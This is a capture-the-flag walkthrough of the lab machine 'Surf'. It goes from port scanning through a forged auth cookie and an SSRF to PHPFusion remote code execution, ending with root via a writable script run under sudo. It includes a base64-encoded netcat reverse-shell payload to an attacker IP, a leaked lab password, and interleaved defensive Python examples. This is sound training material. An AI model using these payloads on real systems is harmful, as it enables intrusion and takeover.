PG - SURF | Walkthrough
TLDR
- Bypass Auth -> SSRF -> RCE
- Exploit misconfigured sudo privilege to root
Enumeration
Nmap
┌──(imtodess㉿deathnote)-[~/ctf/pg/surf/scans]
└─$ nmap $ip -p22,80 -sCV
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-25 11:44 +0545
Nmap scan report for 192.168.194.171
Host is up (0.22s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
| 256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
|_ 256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Surfing blog
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/
Nmap done: 1 IP address (1 host up) scanned in 24.74 seconds
┌──(imtodess㉿deathnote)-[~/ctf/pg/surf/scans]
└─$ gobuster dir -u http://$ip/ -w /usr/share/seclists/Discovery/Web-Content/common.txt --no-error -q -x php,html,txt
/about.html (Status: 200) [Size: 5220]
/administration (Status: 301) [Size: 327] [--> http://192.168.194.171/administration/]
/assets (Status: 301) [Size: 319] [--> http://192.168.194.171/assets/]
/css (Status: 301) [Size: 316] [--> http://192.168.194.171/css/]
/index.html (Status: 200) [Size: 6495]
/index.html (Status: 200) [Size: 6495]
/js (Status: 301) [Size: 315] [--> http://192.168.194.171/js/]
/post.html (Status: 200) [Size: 5724]
/server-status (Status: 403) [Size: 280]
Exploitation
Initial Exploitation
SSRF to PHPFusion RCE
https://www.exploit-db.com/exploits/49911
- Bypass the login by changing the value of the auth_status cookie to eydzdWNjZXNzJzondHJ1ZSd9 while logging in.
┌──(kali㉿kali)-[~]
└─$ echo -n "{'success':'true'}" | base64
eydzdWNjZXNzJzondHJ1ZSd9
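The bypass works because the application's auth_status cookie is nothing more than base64 of a client-chosen string, so the client, not the server, decides whether it is logged in. The Python below is an added example, not code from the original walkthrough or from the target application: it decodes the cookie value shown above, sketches the flawed trust-the-cookie check as a constructed illustration, and puts an HMAC-signed session token beside it that the same forged value cannot satisfy. The key handling, the claim layout and all function names are assumptions.

```python
import base64
import hashlib
import hmac
import json
import secrets
from typing import Optional

# Cookie value from the walkthrough: plain base64, chosen entirely by the client.
FORGED_COOKIE = "eydzdWNjZXNzJzondHJ1ZSd9"


def decode_legacy_cookie(value: str) -> str:
    """Show what the auth_status cookie really carries: an unauthenticated string."""
    return base64.b64decode(value).decode()


def legacy_is_authenticated(value: str) -> bool:
    """Constructed illustration of the flawed pattern the bypass relies on: the
    server believes whatever success flag the browser sends, so anyone who can
    base64-encode a string is 'logged in'. This is not the target's source code."""
    try:
        payload = base64.b64decode(value, validate=True).decode()
    except (ValueError, UnicodeDecodeError):
        return False
    return "'success':'true'" in payload


def issue_session_cookie(user: str, key: bytes) -> str:
    """Hardened form: the server states the claim and signs it with a secret the
    client never sees. Format: base64url(payload) '.' hex(HMAC-SHA256(payload))."""
    claims = {"user": user, "nonce": secrets.token_hex(8)}
    payload = base64.urlsafe_b64encode(json.dumps(claims).encode()).decode().rstrip("=")
    tag = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{tag}"


def verify_session_cookie(value: str, key: bytes) -> Optional[dict]:
    """Return the claims only if the signature checks out, otherwise None.
    A cookie without a tag, with a forged tag, or signed under another key fails."""
    payload, sep, tag = value.rpartition(".")
    if not sep or not payload or not tag:
        return None
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):  # constant-time comparison
        return None
    padded = payload + "=" * (-len(payload) % 4)
    try:
        return json.loads(base64.urlsafe_b64decode(padded))
    except (ValueError, UnicodeDecodeError):
        return None


if __name__ == "__main__":
    key = secrets.token_bytes(32)  # in a real app: loaded from config, never committed
    print("legacy cookie decodes to:", decode_legacy_cookie(FORGED_COOKIE))
    print("legacy check accepts forged cookie:", legacy_is_authenticated(FORGED_COOKIE))
    cookie = issue_session_cookie("james", key)
    print("signed cookie verifies as:", verify_session_cookie(cookie, key))
    print("forged value against signed scheme:", verify_session_cookie(FORGED_COOKIE, key))
```

Signing the cookie stops forgery; it still does not give the server a way to revoke a session. The stronger fix is to keep the login state server-side (the PHPSESSID session the application already has) and make the cookie an opaque identifier that carries no claims at all.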
The /administration/checkserver.php page also mentions the use of PHPFusion.
Exploit using Burp
POST /administration/checkserver.php HTTP/1.1
Host: 192.168.194.171
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 149
Origin: http://192.168.194.171
Connection: close
Referer: http://192.168.194.171/administration/checkserver.php
Cookie: auth_status=eydzdWNjZXNzJzondHJ1ZSd9; PHPSESSID=d1juk9h3fogi4qv3am5p6t66kg
Upgrade-Insecure-Requests: 1
url=http%3a//127.0.0.1%3a8080/infusions/downloads/downloads.php%3fcat_id%3d${system(base64_decode(bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNDkuMTk0IDgwODEK))}
curl -X POST http://$ip/administration/checkserver.php -d 'url=http://127.0.0.1:8080/infusions/downloads/downloads.php?cat_id=${system(base64_decode(bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNDkuMTk0IDgwODEK))}' --cookie "auth_status=eydzdWNjZXNzJzondHJ1ZSd9; PHPSESSID=d1juk9h3fogi4qv3am5p6t66kg"
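checkserver.php fetches whatever url the client submits, which is why a request for 127.0.0.1:8080 reaches the internal PHPFusion instance through the server. As an added example that is neither the target's code nor part of the original walkthrough, here is the target check a server-side fetch feature should apply before it connects: a scheme allowlist, a host allowlist, and a check that every address the host resolves to is public. The allowlist host, the injectable resolver and the function names are assumptions; the constructed resolvers in the demo stand in for DNS so the block runs offline.

```python
import ipaddress
import socket
from typing import Callable, Set, Tuple
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# Constructed allowlist: the only hosts the "check server" feature is meant to reach.
ALLOWED_HOSTS = {"status.example-check-target.test"}


def default_resolver(host: str) -> Set[str]:
    """Resolve a hostname to every address it currently points at (A and AAAA)."""
    return {info[4][0].split("%")[0] for info in socket.getaddrinfo(host, None)}


def is_non_public(address: str) -> bool:
    """True for loopback, RFC 1918, link-local, multicast, reserved and any other
    address a fetch-on-behalf-of-the-client feature must never be pointed at."""
    ip = ipaddress.ip_address(address)
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified
            or not ip.is_global)


def check_target(url: str,
                 resolver: Callable[[str], Set[str]] = default_resolver) -> Tuple[bool, str]:
    """Decide whether the server may fetch `url`; returns (allowed, reason)."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "URL has no host"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo in URL"
    if host not in ALLOWED_HOSTS:
        return False, f"host {host!r} is not in the allowlist"
    try:
        ipaddress.ip_address(host)       # allowlisted IP literal: check it directly
        addresses = {host}
    except ValueError:                   # hostname: check everything it resolves to
        try:
            addresses = resolver(host)
        except OSError as exc:
            return False, f"could not resolve {host!r}: {exc}"
    for address in addresses:
        if is_non_public(address):
            return False, f"{host!r} points at non-public address {address}"
    return True, "ok"


if __name__ == "__main__":
    # The walkthrough's request points the server at its own loopback interface.
    print(check_target("http://127.0.0.1:8080/infusions/downloads/downloads.php"))
    # Constructed DNS answers: a public address, then a record rebound to an internal one.
    print(check_target("https://status.example-check-target.test/ping",
                       lambda host: {"93.184.216.34"}))
    print(check_target("https://status.example-check-target.test/ping",
                       lambda host: {"10.0.0.5"}))
```

Two caveats when wiring this in: connect to the address that was checked rather than resolving the name a second time (otherwise a record that changes between check and fetch, DNS rebinding, slips through), and disable HTTP redirects on the fetch, since a redirect from an allowed host to 127.0.0.1 would bypass the check.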
Privilege Escalation
Get the credentials for user james from the config file:
www-data@Surf:/var/www/server/administration/config$ cat config.php
define('DB_HOST', "localhost");
define('DB_USER', "core");
define('DB_PASSWORD', "FlyToTheMoon213!");
define('DB_NAME', "corephpadmin");
┌──(imtodess㉿deathnote)-[~/ctf/pg/surf/scans]
└─$ ssh james@$ip
$ sudo -l
[sudo] password for james:
Matching Defaults entries for james on Surf:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User james may run the following commands on Surf:
(ALL) /usr/bin/php /var/backups/database-backup.php
database-backup.php is writable by www-data:
james@Surf:/var/www/server/administration/config$ ls -la /var/backups/database-backup.php
-rwxr-xr-x 1 www-data www-data 2758 Nov 9 03:12 /var/backups/database-backup.php
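The root path is a sudo rule that runs, as root, a script owned and writable by www-data; the rule looks harmless in sudo -l, but whoever can write the script controls what root executes. The Python below is an added audit and not part of the walkthrough: it parses sudo -l output for command specs and checks every absolute path in each rule, the interpreter, the script argument and every parent directory, for non-root ownership or group/world write bits. The sample sudo -l text mirrors the page, the fake filesystem reproduces the page's ls output (www-data as uid/gid 33 is the Debian default), and the rule regex and function names are assumptions.

```python
import os
import re
import shlex
import stat
from typing import Callable, Dict, List

# One command spec as printed by `sudo -l`, e.g.
#   (ALL) /usr/bin/php /var/backups/database-backup.php
#   (root : root) NOPASSWD: /usr/bin/systemctl restart apache2
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")


def parse_sudo_l(text: str) -> List[str]:
    """Extract the command specs from `sudo -l` output; header lines are skipped."""
    return [m.group("cmd").strip() for m in map(RULE_RE.match, text.splitlines()) if m]


def path_findings(path: str, st: os.stat_result) -> List[str]:
    """Ownership and permission problems for one path that sudo will run or read as root."""
    findings = []
    if st.st_uid != 0:
        findings.append(f"{path}: owned by uid {st.st_uid}, not root")
    if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        findings.append(f"{path}: writable by group gid {st.st_gid}")
    if st.st_mode & stat.S_IWOTH:
        findings.append(f"{path}: world-writable")
    return findings


def audit_sudo_rules(sudo_l_output: str,
                     stat_fn: Callable[[str], os.stat_result] = os.stat) -> List[str]:
    """Flag every absolute path in every rule (interpreter, script argument and each
    parent directory) that a non-root user could modify or replace."""
    findings = []
    for cmd in parse_sudo_l(sudo_l_output):
        if cmd == "ALL":
            findings.append("rule grants ALL commands")
            continue
        for token in shlex.split(cmd):
            if not token.startswith("/"):
                continue
            path = token
            while True:  # walk up: a writable parent lets the file be swapped out
                try:
                    st = stat_fn(path)
                except OSError as exc:
                    findings.append(f"{path}: cannot stat ({exc})")
                    break
                findings.extend(path_findings(path, st))
                parent = os.path.dirname(path)
                if parent == path:
                    break
                path = parent
    return findings


# Constructed sample data mirroring the walkthrough; no real filesystem access needed.
SAMPLE_SUDO_L = """\
Matching Defaults entries for james on Surf:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User james may run the following commands on Surf:
    (ALL) /usr/bin/php /var/backups/database-backup.php
"""


def _st(mode: int, uid: int, gid: int) -> os.stat_result:
    # os.stat_result takes a 10-tuple: mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime
    return os.stat_result((mode, 0, 0, 1, uid, gid, 0, 0, 0, 0))


DIR, FILE = stat.S_IFDIR | 0o755, stat.S_IFREG | 0o755
FAKE_FS: Dict[str, os.stat_result] = {
    "/": _st(DIR, 0, 0), "/usr": _st(DIR, 0, 0), "/usr/bin": _st(DIR, 0, 0),
    "/usr/bin/php": _st(FILE, 0, 0),
    "/var": _st(DIR, 0, 0), "/var/backups": _st(DIR, 0, 0),
    # -rwxr-xr-x www-data www-data, as in the ls output above (www-data is uid/gid 33 on Debian)
    "/var/backups/database-backup.php": _st(FILE, 33, 33),
}


def fake_stat(path: str) -> os.stat_result:
    try:
        return FAKE_FS[path]
    except KeyError:
        raise FileNotFoundError(path)


if __name__ == "__main__":
    for finding in audit_sudo_rules(SAMPLE_SUDO_L, fake_stat):
        print(finding)
    # On a live host: audit_sudo_rules(subprocess.run(["sudo", "-l"], capture_output=True, text=True).stdout)
```

The fix the audit points at is the usual one: the script sudo runs as root must be root-owned and writable by root only (0755 or 0744), in a root-owned directory, and the web server account should have no write access anywhere under a path that appears in sudoers.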
$ sudo /usr/bin/php /var/backups/database-backup.php
PHP Notice: Undefined variable: daemon in /var/backups/database-backup.php on line 184
Successfully opened reverse shell to 192.168.49.194:8081
┌──(imtodess㉿deathnote)-[~/oscp/exploits]
└─$ nc -nvlp 8081
listening on [any] 8081 ...
connect to [192.168.49.194] from (UNKNOWN) [192.168.194.171] 55636
Linux Surf 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64 GNU/Linux
03:11:44 up 2:19, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
james pts/2 192.168.49.194 03:07 0.00s 0.00s 0.00s -sh
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# cat /root/proof.txt
ce4fce190d3e6028770546e8e2bad828